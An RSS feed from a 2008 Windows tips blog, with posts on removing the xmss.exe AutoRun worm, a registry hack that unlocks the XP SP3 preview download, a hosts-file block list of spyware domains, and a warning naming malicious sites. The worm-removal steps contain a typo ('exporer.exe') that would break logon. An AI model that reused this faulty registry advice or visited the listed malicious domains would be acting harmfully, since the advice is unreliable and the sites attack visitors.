<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Kakkoi &#187; Windows</title>
	<atom:link href="http://42.kaizeku.com/topics/windows/feed/" rel="self" type="application/rss+xml" />
	<link>http://42.kaizeku.com</link>
	<description>web development, software, windows tips and trick</description>
	<pubDate>Sat, 12 Jul 2008 15:10:01 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>How to remove XMSS.exe Win32 AutoRun worm</title>
		<link>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/</link>
		<comments>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/#comments</comments>
		<pubDate>Sat, 16 Feb 2008 11:58:21 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Worm]]></category>

		<category><![CDATA[autorun.abt]]></category>

		<category><![CDATA[autorun.fj]]></category>

		<category><![CDATA[autorun.m]]></category>

		<category><![CDATA[prank]]></category>

		<category><![CDATA[Virus]]></category>

		<category><![CDATA[win32]]></category>

		<category><![CDATA[xmss]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/xmss-exe-funny-ust-scandal-avi-worm/</guid>
		<description><![CDATA[

Yesterday I got a new type of &#8220;Stupid Worm&#8221; hidding in background as xmss.exe. It copied itself on Local disk and Windows Directory (%Windir%). Terminated &#8220;Windows Task Manager&#8221;, Windows Command Prompt (DOS-Prompt) &#38; crashed System Internal Process Explorer (procxp.exe).
Its not a funny video
According to McAfee, this worm is known as W32/Autorun.worm.g.
It can propagate itself over [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2008/03/xmss-exe-funny-ust-scandal.png' alt='xmss-exe-funny-ust-scandal.png image by chaoskaizer' width='128' height='128' class="photo thumb- fl rgb-"/>Yesterday I got a new type of &#8220;Stupid Worm&#8221; hidding in background as <em>xmss.exe</em>. It copied itself on Local disk and Windows Directory <small>(%Windir%)</small>. Terminated &#8220;Windows Task Manager&#8221;, Windows Command Prompt (DOS-Prompt) &amp; crashed System Internal <a href="http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx" class="exturl icn-r1" rel="nofollow robots-nofollow">Process Explorer</a> (procxp.exe).</p>
<h2 class="cb">Its not a funny video</h2>
<p class="xmssexe-descriptions">According to <a href="http://vil.nai.com/vil/content/v_143758.htm" rel="nofollow" class="exturl icn-r1">McAfee</a>, this worm is known as <strong><tt class="di">W32/Autorun.worm.g</tt></strong>.</p>
<blockquote cite="http://vil.nai.com/vil/content/v_143758.htm"><p class="cite">It can propagate itself over removable media and network drives and cause execution of malicious code via an <tt class="di">autorun.inf</tt> file.</p>
</blockquote>
<p><span id="more-217"></span></p>
<h2 class="mgt mgb-">XMSS.exe Win32 AutoRun Files</h2>
<ul class="xoxo exturl">
<li><strong class="fw-"><tt class="di">x:autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">x:xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">x:Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\Funny UST Scandal.avi.exe</tt></strong></li>
</ul>
<h2 class="cb mgt">Fixes Win32 AutoRun.* Worm</h2>
<p>Here&#8217;s a few step to prevent <strong class="fw-">Win32 AutoRun Worm</strong>. </p>
<ol class="xoxo">
<li>Disabled System Restore for Temporary - <a href="http://support.microsoft.com/kb/264887/en-us" class="exturl icn-r1" title="How to Enable and Disable System Restore">KB 264887</a></li>
<li>Boot Windows in Safe Mode - <a class="exturl icn-r1" href="http://support.microsoft.com/kb/315222" title="Safe Mode Boot options in Windows XP">KB 315222</a></li>
<li>
<p>In Windows Safe Mode, Open Windows Registry Editor</p>
<p><tt class="di">Windows Start > Run > Regedit</tt></p>
<li>
<p>Browse to the following registry settings &darr;</p>
<p><tt class="di">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell</tt>
</li>
<li>Replace<br />
<em><tt class="di">explorer.exe, xmss.exe</tt></em> with <em><tt class="di">exporer.exe</tt></em><br />
<img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/xmss-exe-regedit.png' alt='xmss-exe-regedit.png' width="708" height="378" class="mgt mgb" />
</li>
<li>Delete all the following files
<ul class="xoxo">
<li><strong class="fw-"><tt class="di">C\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">C\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">C\Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">X:\Funny UST Scandal.avi.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\autorun.inf</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\xmss.exe</tt></strong></li>
<li><strong class="fw-"><tt class="di">%Windir%\Funny UST Scandal.avi.exe</tt></strong></li>
</ul>
<p class="notice">%Windir% refers to the Windows folder (e.g. C:\Windows, C:\WindowsNT) and X: is drive letters used by a removable or network drive</p>
</li>
<li>Clean All Windows Temporary Files</li>
<li>Restart Windows</li>
</ol>
<h2 class="cb">XMSS.exe Win32 Autorun Variants</h2>
<p><small>VirusTotal.com - Dec 2007 Results.</small></p>
<table border="1">
<tr>
<td>Antivirus</td>
<td>Version</td>
<td>Last Update</td>
<td>Result</td</tr>
<tr>
<td>AhnLab-V3</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>AntiVir</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Authentium</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Avast</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>AVG</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>BitDefender</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>CAT-QuickHeal</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Worm.AutoRun.abt</td</tr>
<tr>
<td>ClamAV</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Autoit-6</td</tr>
<tr>
<td>DrWeb</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>eSafe</td>
<td>-</td>
<td>-</td>
<td style="color: red;">suspicious Trojan/Worm</td</tr>
<tr>
<td>eTrust-Vet</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Ewido</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>FileAdvisor</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Fortinet</td>
<td>-</td>
<td>-</td>
<td style="color: red;">W32/Autoit.BG!tr</td</tr>
<tr>
<td>F-Prot</td>
<td>-</td>
<td>-</td>
<td style="color: red;">W32/Trojan!c4a4</td</tr>
<tr>
<td>F-Secure</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Win32.Autoit.bg</td</tr>
<tr>
<td>Ikarus</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Virus.Win32.AutoRun.pc</td</tr>
<tr>
<td>Kaspersky</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.Win32.Autoit.bg</td</tr>
<tr>
<td>McAfee</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Microsoft</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>NOD32v2</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Win32/HackAV.P</td</tr>
<tr>
<td>Norman</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Panda</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Suspicious file</td</tr>
<tr>
<td>Prevx1</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.DoS.Win32.Opdos</td</tr>
<tr>
<td>Rising</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Worm.Win32.Autorun.jax</td</tr>
<tr>
<td>Sophos</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Sunbelt</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>Symantec</td>
<td>-</td>
<td>-</td>
<td>-</td</tr>
<tr>
<td>TheHacker</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan/Autoit.bg</td</tr>
<tr>
<td>VBA32</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Virus.Win32.AutoRun.pc</td</tr>
<tr>
<td>VirusBuster</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Trojan.AutoIt.BB</td</tr>
<tr>
<td>Webwasher-Gateway</td>
<td>-</td>
<td>-</td>
<td style="color: red;">Riskware.HackAV</td</tr>
</table>
<h2 class="mgt mgb-">External Links</h2>
<ul class="xoxo exturl">
<li><a href="http://support.microsoft.com/kb/264887/en-us">How to Enable and Disable System Restore</a></li>
<li><a href="http://support.microsoft.com/kb/315222">Safe Mode Boot options in Windows</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/xmss-exe-funny-ust-scandal-avi-worm/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to bypass MS Download Center and Download WindowsXP SP3 RC</title>
		<link>http://42.kaizeku.com/windows/how-to-bypass-ms-download-center-and-download-windowsxp-sp3-rc/</link>
		<comments>http://42.kaizeku.com/windows/how-to-bypass-ms-download-center-and-download-windowsxp-sp3-rc/#comments</comments>
		<pubDate>Sun, 23 Dec 2007 14:04:56 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Windows]]></category>

		<category><![CDATA[Downloads]]></category>

		<category><![CDATA[mircosoft]]></category>

		<category><![CDATA[service pack]]></category>

		<category><![CDATA[sp]]></category>

		<category><![CDATA[sp3]]></category>

		<category><![CDATA[Windows XP SP 3 rc]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/how-to-bypass-ms-download-center-and-download-windowsxp-sp3-rc/</guid>
		<description><![CDATA[<strong>Windows XP Service Pack 3</strong> (RC) (12/18/2007) is not release for public yet. Before you try this registry hack, go to MS Download Center and see if you are allowed to download the update package.
<ul>
	<li>Microsoft Download Center &#8594; <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=75ed934c-8423-4386-ad98-36b124a720aa&#038;DisplayLang=en"> Windows XP Service Pack 3 Release Candidate</a>.</li>
</ul>

If the above failed you may try the Beta Tester hack below.

The following registry hack will set you as one of the Beta Tester so you can download SP3 at Microsoft Download Center.

<pre class="prebox" style="height:60px">
@echo off
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /f 2> NUL 
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /v RCPreview /t REG_SZ /d 1c667073-b87f-4f52-a479-98c85711d869 /f
</pre>
Copy the above code and save it as [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><strong>Windows XP Service Pack 3</strong> (RC) (12/18/2007) is not release for public yet. Before you try this registry hack, go to MS Download Center and see if you are allowed to download the update package.</p>
<ul>
<li>Microsoft Download Center &rarr; <a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=75ed934c-8423-4386-ad98-36b124a720aa&#038;DisplayLang=en"> Windows XP Service Pack 3 Release Candidate</a>.</li>
</ul>
<p>If the above failed you may try the Beta Tester hack below.</p>
<p>The following registry hack will set you as one of the Beta Tester so you can download SP3 at Microsoft Download Center.<br />
<span id="more-106"></span></p>
<pre class="prebox">
@echo off
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /f 2> NUL
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\XPSP3 /v RCPreview /t REG_SZ /d 1c667073-b87f-4f52-a479-98c85711d869 /f
</pre>
<p>Copy the above code and save it as sp3betatester.bat or sp3betatester.cmd in your &#8220;C:\&#8221;. Run the sp3betatester.* file and go to start &rarr; windows update. You should now see Windows XP SP3 (rc) listed in the available updates. </p>
<p class="padbox"><span class="b">Microsoft Disclaimer</span><br />
This pre-release software is provided for testing purposes only. Microsoft does not recommend installing this software on primary or mission critical systems. Microsoft recommends that you have a backup of your data prior to installing any pre-release software.
</p>
<h2 class="sep">Uninstaller</h2>
<p>SP3 installation has a recovery mode (rollback) make sure System Restore is enable when you setup SP3. You can removed SP3 via Windows Add Remove Programs or by manual using its build in uninstaller at <tt>C:\WINDOWS\$NtServicePackUninstall$\spuninst</tt></p>
<h2 class="sep">External Links</h2>
<ul>
<li><a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=68C48DAD-BC34-40BE-8D85-6BB4F56F5110&#038;displaylang=en">Windows XP Service Pack 3 Overview</a>
<li><a href="http://forums.microsoft.com/TechNet/ShowForum.aspx?ForumID=2010&#038;SiteID=17">Official Windows XP SP3 Forum</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/how-to-bypass-ms-download-center-and-download-windowsxp-sp3-rc/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to safely remove AcroRd32Info.exe</title>
		<link>http://42.kaizeku.com/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/</link>
		<comments>http://42.kaizeku.com/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/#comments</comments>
		<pubDate>Thu, 29 Nov 2007 13:05:00 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Acrobat Reader]]></category>

		<category><![CDATA[Adobe]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[AcroRd32Info]]></category>

		<category><![CDATA[acrotray]]></category>

		<category><![CDATA[AdobeReader.K]]></category>

		<category><![CDATA[Explorer]]></category>

		<category><![CDATA[Malware]]></category>

		<category><![CDATA[pdf]]></category>

		<category><![CDATA[prefetching]]></category>

		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/</guid>
		<description><![CDATA[<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/11/acrord32info.jpg' alt='AcroRd32Info' style="float:left;margin-right:3px;margin-bottom: 0px" /><strong><a href="http://www.adobe.com/products/acrobat/readstep2.html">AcroRd32Info</a></strong> is a another creative pieces of crap from <a href="http://www.adobe.com">Adobe</a> a package  for Acrobat Reader. Embed in Windows Explorer Shell, its main role is to start an initial prefetching for PDF documents in the Memory.</p>

<p>To test this program behavior, you will need to open your windows task manager (ctrl+alt+del once) and browse to any folder that contained a PDF documents and stay idle. Within just few seconds <strong>AdobeRd32Info</strong> will be loaded in the background and stay in memory.That was just for  browsing the folder without opening any PDF files yet.</p> 

<p>Windows has a standard prefetch modes and its fairly stable for most of the applications out there. Having a another background prefetcher hook on explorer is plain abusive not to mention its running without the owner permissions.</p> 

<p>AcroRd32Info stay in your memory so consider it as a pest. So how to disabled it?</p>
]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/11/acrord32info.jpg' alt='AcroRd32Info' style="float:left;margin-right:3px;margin-bottom: 0px" /><strong><a href="http://www.adobe.com/products/acrobat/readstep2.html">AcroRd32Info</a></strong> is a another creative pieces of crap from <a href="http://www.adobe.com">Adobe</a> a package for Acrobat Reader. Embed in Windows Explorer Shell, its main role is to start an initial prefetching for PDF documents in the Memory.</p>
<p><span id="more-37"></span></p>
<p>To test this program behavior, you will need to open your windows task manager (ctrl+alt+del once) and browse to any folder that contained a PDF documents and stay idle. Within just few seconds <strong>AdobeRd32Info</strong> will be loaded in the background and stay in memory.That was just for browsing the folder without opening any PDF files yet.</p>
<p>Windows has a standard prefetch modes and its fairly stable for most of the applications out there. Having a another background prefetcher hook on explorer is plain abusive not to mention its running without the owner permissions.</p>
<p>Adobe Reader is cheating. Its understable that with this methods it will improve the Acrobat boot time log, but I dont see much differences when its running in the background preparing to load a single PDF documents, its a pollutions.</p>
<p>AcroRd32Info stay in your memory so consider it as a <span class="hilite-3">pestware</span>.</p>
<p>Here&#8217;s how you can <em>safely</em> removed this programs. </p>
<h3 id="removed">The proper way</h3>
<ul>
<li>open <strong>Adobe AcroRd32</strong></li>
<li>Edit &raquo; Preferences </li>
<li>Select the <strong>internet</strong> categories in the menu list then disabled <br /><strong>Allow fast web view</strong> &#038; <strong>Allow speculative downloading in the background</strong></li>
</ul>
<p>If thats doesnt work, you try this <strong>unrecommended</strong> method to disabled it.</p>
<ul>
<li>Browse to Adobe Reader directory usually at &#8220;Program Files\Adobe\Reader\&#8221; </li>
<li>Find <strong>AcroRd32Info.exe</strong></li>
<li>Rename it from <strong>AcroRd32Info.exe</strong> to <strong>Acro_Rd32Info.exe</strong></li>
</ul>
<h2>Recent Exploit on Adobe Reader</h2>
<h3 id="AdobeReaderK">Exploit:W32/AdobeReader.K</h3>
<p class="notice" style="padding:10px;margin:18px auto;border:1px solid #ccc">From FSECURE, <a href="http://blog.kakkoi.net/uri/d3d3LmYtc2VjdXJlLmNvbS92LWRlc2NzL2V4cGxvaXRfdzMyX2Fkb2JlcmVhZGVyX2suc2h0bWw.curie,80,302" rel="external" title="External site">Exploit:W32/AdobeReader.K</a> is detection of a malicious PDF file that is being heavily spammed through e-mail and it appears as an attachment.<br />
This malicious PDF file takes advantage of a vulnerability on the URI handling of PDF files. This vulnerability affects IE7, Adobe Acrobat, and Adobe Reader on some platforms.<br />
Users should update their Adobe Reader installations. </p>
<h3>Affected Software Versions</h3>
<p>Adobe Reader 8.1 and earlier, Adobe Reader 7.0.9 and earlier. Adobe Acrobat Professional, 3D and Standard 8.1 and earlier versions, Adobe Acrobat Professional, Standard, 3D and Elements 7.0.9 and earlier.</p>
<p>More info on this exploits at <a href="http://blog.kakkoi.net/uri/bnZkLm5pc3QuZ292L252ZC5jZm0_Y3ZlbmFtZT1DVkUtMjAwNy01MDIw.curie,80,302">National Vulnerability Database</a></p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/how-to-safely-removed-acrord32infoexe-adobe-reader/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to Block Acces to Unsavory Websites Without using Firewall or third party software</title>
		<link>http://42.kaizeku.com/windows/how-to-block-website-without-using-firewall/</link>
		<comments>http://42.kaizeku.com/windows/how-to-block-website-without-using-firewall/#comments</comments>
		<pubDate>Tue, 27 Nov 2007 17:42:51 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Tips]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[block website]]></category>

		<category><![CDATA[dialer]]></category>

		<category><![CDATA[filtering]]></category>

		<category><![CDATA[firewall]]></category>

		<category><![CDATA[opendns]]></category>

		<category><![CDATA[phissing site]]></category>

		<category><![CDATA[spams]]></category>

		<category><![CDATA[window]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/how-to-block-website-without-using-firewall/</guid>
		<description><![CDATA[

There is many reason why you need to block certain website from being access in your network. below is a &#8220;the few reason why&#8221;. 

It&#8217;s a warez and porn sites.
I don&#8217;t want my employee to view my Competitor Websites.
I&#8217;m using illegal software and It seem necessary to disable the automated online registry checkup. ;p
I&#8217;m against [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>There is many reason why you need to block certain website from being access in your network. below is a &#8220;the few reason why&#8221;. </p>
<ol>
<li>It&#8217;s a warez and porn sites.</li>
<li>I don&#8217;t want my employee to view my Competitor Websites.</li>
<li>I&#8217;m using illegal software and It seem necessary to disable the automated online registry checkup. ;p</li>
<li>I&#8217;m against this [countryname] I want to block all this particular domain from being access.</li>
<li>I hated this [socialnetworksite]</li>
</ol>
<p><span id="more-26"></span></p>
<h2>Safe Blocking</h2>
<p>Here&#8217;s two methods you can safely used to block or redirect unwanted website from being access without using third party software.</p>
<h3>1. Block Website using Windows Host file</h3>
<p>Open Window explorer, browse to <em>C:\WINDOWS\system32\drivers\etc</em> click on the file name &#8220;<strong>host</strong>&#8221; <small>(the file has no extension)</small> make a backup copy first. Then right click view file properties and disabled the read only attributes and open it with a text editor (i.e: notepad).</p>
<h5>Windows host settings instructions note</h5>
<blockquote cite="http://blog.kakkoi.net/windows/how-to-block-website-without-using-firewall/"><p>This file contains the mappings of IP addresses to host names. Each entry should be kept on an individual line. The IP address should be placed in the first column followed by the corresponding host name. The IP address and the host name should be separated by at least one space.</p></blockquote>
<p><tt>route-to target-hostname</tt><br />
example<br />
<tt>127.0.1.1 www.thewebsite.com</tt></p>
<p class="notice">note: 127.0.1.1 is you localhost address this is where you want the target-hostname/website to redirect. thewebsite.com is the targeted website URL.</p>
<p>alternatively you can also redirect it to google<br />
<tt>64.233.167.99 www.thewebsite.com</tt></p>
<p>Save the file and restore back the read only mode, then type in the block address url in your browser see if works.</p>
<h2>OpenDNS filtering</h2>
<p>The second methods is universal, its work on any operating systems. <a href="http://www.opendns.com">OpenDNS</a>filtering. This articles wont teach you how to setup opendns, you can read it at <a href="http://www.opendns.com/support/article/39">https://www.opendns.com/start</a>. After you had setup OpenDNS account. Read their <a href="http://www.opendns.com/support/article/39">KB39 articles</a><br />
<img src="http://blog.kakkoi.net/wp-content/uploads/2007/11/open-dns-blokcdomain.png" alt="open-dns-blokcdomain.png" width="350" /><br />
its pretty much straight forward from there on. I&#8217;m sure you wont have problem configuring opendns filter . everything is just 2 click way.</p>
<h2 class="cb">Example Blocked Lists</h2>
<pre class="prebox">
127.0.0.1	babe.the-killer.bz
127.0.0.1	www.babe.the-killer.bz
127.0.0.1	babe.k-lined.com
127.0.0.1	www.babe.k-lined.com
127.0.0.1	did.i-used.cc
127.0.0.1	www.did.i-used.cc
127.0.0.1	coolwwwsearch.com
127.0.0.1	www.coolwwwsearch.com
127.0.0.1	coolwebsearch.com
127.0.0.1	www.coolwebsearch.com
127.0.0.1	hi.studioaperto.net
127.0.0.1	www.hi.studioaperto.net
127.0.0.1	webbrowser.tv
127.0.0.1	www.webbrowser.tv
</pre>
<p class="notice">Notes: Notice the double entries for each domain <span class="fw">example.com</span> and <span class="fw">www.example.com</span> , You will need both long and short URL for effective blocking. Dont depend on canonical address</p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/how-to-block-website-without-using-firewall/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Beware of this site</title>
		<link>http://42.kaizeku.com/security/virus/js-exploit-adodb-stream-nap-rojan/</link>
		<comments>http://42.kaizeku.com/security/virus/js-exploit-adodb-stream-nap-rojan/#comments</comments>
		<pubDate>Sat, 24 Nov 2007 03:03:05 +0000</pubDate>
		<dc:creator>Nick B</dc:creator>
		
		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[Virus]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[JS/Exploit.ADODB.Stream NAP Trojan warez streaming]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/virus/js-exploit-adodb-stream-nap-rojan/</guid>
		<description><![CDATA[

Its quite rare to see website attacking visitors but the following site is an exception.

girlhell.org
66.79.184.58
Apr 27 08 - usawarez.net

There is few known threads from the above website

JS/Exploit.ADODB.Stream NAP Trojan
Hidden download.
usawarez - False Image Checksum/corrupted 

Fracois Paget from McAfee explain in great details regarding this Stream Attack and their Complete Methods. I&#8217;m quite amazed with the [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>Its quite rare to see website attacking visitors but the following site is an exception.</p>
<ol>
<li><code>girlhell.org</code></li>
<li><code>66.79.184.58</code></li>
<li><small>Apr 27 08</small> - <code>usawarez.net</code></li>
</ol>
<p>There is few known threads from the above website</p>
<ol>
<li><strong>JS/Exploit.ADODB.Stream NAP Trojan</strong></li>
<li>Hidden download.</li>
<li>usawarez - False Image Checksum/corrupted </li>
</ol>
<p>Fracois Paget from McAfee explain in great details regarding this Stream Attack and their Complete Methods. I&#8217;m quite amazed with the analysis. read it all <a href="http://blog.kakkoi.net/uri/d3d3LmF2ZXJ0bGFicy5jb20vcmVzZWFyY2gvYmxvZy9pbmRleC5waHAvMjAwNy8wNS8yNS9hbm90aGVyLWlkZW50aXR5LXRoZWZ0LXN0b3J5LTIv.curie,80,302" title="McAfee Blog" rel="external">here</a>.</p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/virus/js-exploit-adodb-stream-nap-rojan/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to properly flush DNS cache</title>
		<link>http://42.kaizeku.com/windows/how-do-i-flush-dns-cache/</link>
		<comments>http://42.kaizeku.com/windows/how-do-i-flush-dns-cache/#comments</comments>
		<pubDate>Mon, 19 Nov 2007 16:37:12 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Linux]]></category>

		<category><![CDATA[Tips]]></category>

		<category><![CDATA[Windows]]></category>

		<category><![CDATA[dns]]></category>

		<category><![CDATA[dns cache]]></category>

		<category><![CDATA[ipconfig]]></category>

		<category><![CDATA[lookupd]]></category>

		<category><![CDATA[nscd]]></category>

		<category><![CDATA[nslookup]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/how-do-i-flush-dns-cache/</guid>
		<description><![CDATA[Tips on proper troubleshooting dns cache. The Domain Name System is one of the foundations of the internet. It is the system that allows the translation of human-readable domain names into machines-readable IP addresses and the reverse translation of IP addresses into domain names.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>DNS (Domain Name System), is the service which translates between Internet names and Internet addresses.</p>
<p> <blocquote cite="http://blog.kakkoi.net">
<p>The Domain Name System is one of the foundations of the internet. It is the system that allows the translation of human-readable domain names into machines-readable IP addresses and the reverse translation of IP addresses into domain names.</p>
<p>When you surf on net the dns records will be cache inside your pc. This methods will make your browsing much faster because you wont need to resolve the dns each time you surf a site or network. But sometimes caching can be an issue when certain network change their ip address. You can resolve this by clearing or flushing the dns. Here a few simple command on how to flush your dns cache in PC, Mac &amp; *nix operating systems.</p>
<h3>Windows PC</h3>
<p><tt>Start &gt; Run &gt; ipconfig /flushdns</tt></p>
<h3>Mac</h3>
<p>Open Console <tt>lookupd -flushcache</tt></p>
<h3>Linux</h3>
<p>restart nscd daemon.<br />
Open Console <tt>/etc/rc.d/init.d/nscd restart</tt></p>
<h3>Stop dnscache via Windows services</h3>
<p>For windows, If you are having frequent issue with dns caching you can disabled the dns-client caching services with</p>
<ul>
<li> Start &gt; Run <tt> net stop dnscache</tt></li>
<li>or manually stopping the services via <em>services.msc</em> (microsoft services console).<br />
sc servername stop dnscache</li>
</ul>
<p></blocquote></p>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/windows/how-do-i-flush-dns-cache/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Windows LiveWriter Polaroid Plugins</title>
		<link>http://42.kaizeku.com/windows/live-writer/windows-livewriter-polaroid-plugins/</link>
		<comments>http://42.kaizeku.com/windows/live-writer/windows-livewriter-polaroid-plugins/#comments</comments>
		<pubDate>Sun, 18 Nov 2007 00:23:09 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Live Writer]]></category>

		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[microsoft]]></category>

		<category><![CDATA[plugins]]></category>

		<category><![CDATA[polaroid]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/windows/live-writer/windows-livewriter-polaroid-plugins/</guid>
		<description><![CDATA[Testing Live Writer on Wordpress 2.3.1]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>WordPress 2.3.1 Support Windows Live Writer RSD. I&#8217;m posting this via live writer. You can download this Polaroid plugins at <a href="http://gallery.live.com/liveItemDetail.aspx?li=6a125986-6550-4ce9-9c71-9a0fbbc3443f&amp;bt=9&amp;pl=8&amp;nick=1" title="LiveWriter Addons Gallery" rel="nofollow">LiveWriter Addons Gallery</a> .</p>
<p class="wlWriterSmartContent" id="scid:887EC618-8FBE-DEAD-BEEF-2339AF2EC721:7e9efe44-65f2-451e-97f2-97398711361b" style="margin: 0px; padding: 0px; display: inline"><a href="http://blog.kakkoi.net/wp-content/uploads/2007/11/kittehfingering.8x6.jpg" title="Kitteh Finger" rel="thumbnail"><img src="http://blog.kakkoi.net/wp-content/uploads/2007/11/kittehfingering.jpg" border="0" /></a></p>
